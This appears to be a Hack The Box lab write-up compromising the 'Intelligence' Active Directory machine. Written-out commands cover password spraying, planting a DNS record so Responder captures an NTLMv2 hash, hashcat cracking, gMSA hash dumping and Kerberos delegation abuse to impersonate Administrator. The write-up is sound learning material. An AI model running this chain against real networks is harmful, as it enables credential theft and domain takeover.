Hack The Box – Intelligence

Link: https://app.hackthebox.eu/machines/357

Uncredentialed Enumeration

TCP Port Scan

tcp port scan with version detection

Our initial port scan reveals 10 open ports, including: SMB, web server, ldap, DNS, kerberos.

SMB Share

Using smbclient -L 10.129.122.188 allows us to anonymously login, however we cannot see any shares. I also tested some nmap scripts using --script=smb-enum-* and --script-smb-vuln-*. I did get some useful results with --script=smb2*

Mainly just the security mode having message signing enabled and required.

smbmap fails to provide useful results.

LDAP Enumeration

I attempted to use a Python script for enumeration, but without credentials it fails to bind.

DNS Enumeration

Attempting to use tools such as nslookup, dnsenum and dnsrecon failed to provide useful results.

Web Server

Navigating to the IP over port 80 serves a standard bootstrap template page. There is a form for collecting an email address but it is not hooked up to actually send/collect data.

I performed a gobuster dir scan, this scan did turn up a /documents endpoint with directory indexing off. Attempting to access this directory returns a 403 Forbidden error.

$ gobuster dir -u http://10.129.122.188/ -w /usr/share/wordlists/dirb/big.txt 

I also mapped the IP to intelligence.htb in /etc/hosts and performed a gobuster vhost scan to search for any notable subdomains. If not already installed, you can download SecLists from here.

$ gobuster vhost -u http://intelligence.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt


This search returned nothing useful.

Looking closer at the source code, everything appears to be stored in the /documents directory. We can also see two files with the format yyyy-mm-dd-upload.pdf. I created a python script to generate two years worth of filenames formatted this way and ran it through gobuster.

For the file generation:

Now for gobuster:

$ gobuster dir -u http://10.129.122.188/documents -w /home/kali/htb/dates.txt -e > docs.txt

This scan reveals 95 PDF files. Many of which are just Lorem Ipsum text, but there are a few files that are noteworthy:


2020-12-30-upload.pdf

Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again. Also, after discussion following our recent security audit we are in the process of locking down our service accounts.

2020-06-04-upload.pdf

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.

Using the output from gobuster, I cleaned this document up to have one link per line and then I used wget to grab all the files.

cd ~/Downloads/docs
wget -i ~/docs.txt
strings 202* | grep /Creator

I copied the results of the grep command into a text file and removed duplicates and it gives us a list of 30 unique accounts:

 /Creator (William.Lee)
 /Creator (Scott.Scott)
 /Creator (Jason.Wright)
 /Creator (Veronica.Patel)
 /Creator (Jennifer.Thomas)
 /Creator (Danny.Matthews)
 /Creator (David.Reed)
 /Creator (Stephanie.Young)
 /Creator (Daniel.Shelton)
 /Creator (Jose.Williams)
 /Creator (John.Coleman)
 /Creator (Brian.Morris)
 /Creator (Thomas.Valenzuela)
 /Creator (Travis.Evans)
 /Creator (Samuel.Richardson)
 /Creator (Richard.Williams)
 /Creator (David.Mcbride)
 /Creator (Anita.Roberts)
 /Creator (Brian.Baker)
 /Creator (Kelly.Long)
 /Creator (Nicole.Brock)
 /Creator (Kaitlyn.Zimmerman)
 /Creator (Jason.Patterson)
 /Creator (Darryl.Harris)
 /Creator (David.Wilson)
 /Creator (Teresa.Williamson)
 /Creator (Ian.Duncan)
 /Creator (Jessica.Moody)
 /Creator (Tiffany.Molina)
 /Creator (Thomas.Hall)

I used this list of usernames and the password of NewIntelligenceCorpUser9876 and finally we do get a hit with:

  • Tiffany.Molina | NewIntelligenceCorpUser9876

Credentialed Enumeration

SMB Enumeration

With our first set of credentials, we can use some tools to help get more info, such as smbmap

$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina -R 

This command recursively lists all files in shares that we have read access to.

Notably, we have access to

  • \\IT which has a downdetector.ps1 file inside of it.
  • \Users which has Administrator, Ted.Graves and Tiffany.Molina folders
  • \Users\Tiffany.Molina\Desktop which has our user.txt flag

Our access is only at most Read Only.

We can get access to the user flag with:

$ smbmap -p NewIntelligenceCorpUser9876 -H 10.129.122.188 -u Tiffany.Molina --download Users/Tiffany.Molina/Desktop/user.txt 

I used the same command to grab the downdetector.ps1 file which has the following contents:

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
 try {
  $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
  if(.StatusCode -ne 200) {
    Send-MailMessage -From 'Ted Graves [email protected]' -To 'Ted Graves [email protected]' -Subject "Host: $($record.Name) is down"
  }
 } 
 catch {}
}

It appears to check every server in AD every 5 minutes with a name like web* and then will email Ted.Graves if the status returns anything other than 200.

LDAP Enumeration

I reused the python script from earlier with credentials to get information on ldap:

$ python3 ad-ldap-enum.py -d intelligence.htb -l 10.129.122.188 -u Tiffany.Molina -p NewIntelligenceCorpUser9876

This script drops a few .tsv files that gives us more information into which users are in which groups. Most important for us are the following:

dba            Jeremy.Mora              NORMAL DONT_EXPIRE_PASSWORD 
itsupport      Ted.Graves               NORMAL DONT_EXPIRE_PASSWORD 
itsupport      Laura.Lee                NORMAL DONT_EXPIRE_PASSWORD 
sysadmin       Jason.Patterson          NORMAL DONT_EXPIRE_PASSWORD 
Domain Users   Administrator            NORMAL DONT_EXPIRE_PASSWORD 
Domain Guests  Guest           DISABLED NORMAL DONT_EXPIRE_PASSWORD 
Domain Users   krbtgt          DISABLED NORMAL DONT_EXPIRE_PASSWORD 
...
Domain Users   Tiffany.Molina           NORMAL DONT_EXPIRE_PASSWORD 

The Operating System displays as Windows Server 2019 Datacenter 10.0 (17763).

I also installed JXplorer and used [email protected] as the username for a GUI way of searching through the directory, but I did not find anything of use on any of the users.

Capture the Hash

Our current user account is just a basic level account with only read access to anything, so we need to find another account to pivot to. That powershell script that we found before will search the DNS for any websites starting with “web” and then send an email for Ted to click on. We can capture that with responder and take the hash of the user trying to connect to us.

Phase 1 means we need to add a DNS record into AD starting with web that points back to our attacking machine. I found a GitHub that has a python script we can use to do this:

Our attacking IP is the one ending in xxx.

$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r web123.intelligence.htb -d 10.10.14.xxx 10.129.122.188

Phase 2 means starting responder to catch the response

$ sudo responder -I tun0 -A

Now we wait until that script runs within 5 minutes and we get a hit!

[HTTP] NTLMv2 Client   : 10.129.122.188
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:8a9face4ef7cdc7b:EB65005B0492CBA111472146584E5F65:0101000000000000201FB8A9F89DD701789418BC2F40E95C00000...00000000000000000000900380048005400540050002F007700650062003100320033002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 

NTLMv2 includes a time-based response so I don’t think we will be able to do a Pass the Hash attack.

I copied the hash and echo‘d it to hash.txt Now we can use hashcat to attempt to crack the hash. We can find the mode from this list here, we know it is NTLMv2.

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o hash_cracked.txt

After a few moments, we get a password output to our text file

SMB Enumeration – Again

Now let’s check to see what we can find in Ted.Graves’ directory on the machine

$ smbmap -p ... -H 10.129.122.188 -u Ted.Graves -R

I don’t see anything of use here.

Escalation

Get NT Hash for Service Account

In the note that we read before, there was a mention of service accounts being updated. I found a Github for a dump of Group Managed Service Accounts information.

$ python3 gMSADumper.py -u Ted.Graves -p ... -d intelligence.htb
Users or groups who can read password for svc_int$:
  > DC$
  > itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239 

This gives us the NT hash for svc_int. Now we can use some impacket tools to further our cause

Exchange Hash for Kerberos Ticket

Impacket has a tool named getST.py that “Given a password, hash or aesKey, it will request a Service Ticket and save it as ccache”. On kali, I ran cd opt/impacket/examples to find the script.

Looking at the commands, we need to find the SPN, or target service, to generate a ticket for. Using Ted’s credentials, let’s investigate ldap once more. This help article from Microsoft tells us what to look for in AD, the ms-DS-Allowed-To-Delegate-To attribute.

I fired up JXplorer, and navigated to the Managed Service Accounts section. We see the svc_int account here. Looking under the Table Editor there we can find msDS-AllowedToDelegateTo with the value we need www/dc.intelligence.htb.

We need to be sure to add this dc.intelligence.htb to our /etc/hosts file now.

view in JXplorer

Now with the SPN, we can use it as such:

$ python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Unfortunately, the time of my kali virtual box differs too greatly from the windows machine’s time so we are going to need to sync them. We can do so using ntpdate.

IMPORTANT NOTE: I am using Parallels on a Mac, so I had to change a Parallels setting for it to work:

Ensure time is set to Do not sync
$ sudo apt-get install ntpdate
$ sudo ntpdate 10.129.122.188
30 Aug 20:18:30 ntpdate[56371]: step time server 10.129.122.188 offset +25199.774292 sec

Now if we rerun the command above for the service ticket:

service ticket granted!

We now have a service ticket for the admin account we have a couple of different options to connect. I am going to connect via impacket’s smbclient.py

$ smbclient.py -k intelligence.htb/[email protected] -dc-ip 10.129.122.188 -no-pass

Now that we are connected to the client, we can run a few commands to navigate to the ADMIN account

# shares
# use C$
# cd Users
# cd Administrator
# cd Desktop
# get root.txt

It will download root.txt in whatever directory you were in when you ran the smbclient.py command. For me it was in ~/htb.

Conclusion

This machine was really difficult for me and I learned a lot of new tools. I had done a Golden Ticket before on TryHackMe, but the process was very fuzzy so I had to keep doing a lot of research on what to do next. Writing a custom script to discover, download files and build a wordlist of usernames was very cool.

This felt a lot more realistic in the fact we found one account but I had to get another account to then get to another account in order to finally get the flag. A lot of corporations use Windows machines so the experience of using impacket in order to grant a service ticket was very useful knowledge that I am sure will be more useful in the future.

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *